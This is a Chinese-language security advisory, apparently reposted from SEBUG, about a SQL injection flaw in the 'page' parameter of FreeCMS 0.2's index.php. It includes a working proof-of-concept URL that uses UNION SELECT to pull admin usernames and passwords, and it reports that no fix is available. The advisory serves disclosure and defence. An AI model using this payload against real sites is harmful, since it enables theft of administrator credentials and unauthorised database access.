FreeCMS index.php SQL注入漏洞 -電腦資料

電腦資料時間：2019-01-01 我要投稿

【www.emoneyp.cn - 電腦資料】

FreeCMS.us FreeCMS 0.2

描述:

BUGTRAQ ID: 29773

CNCAN ID：CNCAN-2008061903

FreeCMS是一款基于PHP的WEB應(yīng)用程序，

。

FreeCMS不正確處理用戶提交的輸入，遠程攻擊者可以利用漏洞進行SQL注入攻擊，可能獲得敏感信息或操作數(shù)據(jù)庫。

問題是'index.php'腳本對用戶提交給'page'參數(shù)缺少過濾，構(gòu)建惡意SQL查詢作為參數(shù)數(shù)據(jù)，可更改原來的SQL邏輯，獲得敏感信息或操作數(shù)據(jù)庫。

<* 參考:

漏洞提供者

Mr.SQL

測試方法:

[警告]

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用.風(fēng)險自負(fù)!

http://www.example.com/index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin/*

建議:

目前沒有解決方案提供：

http://www.freecms.us/

本信息收集自 SEBUG Security Database

相關(guān)文章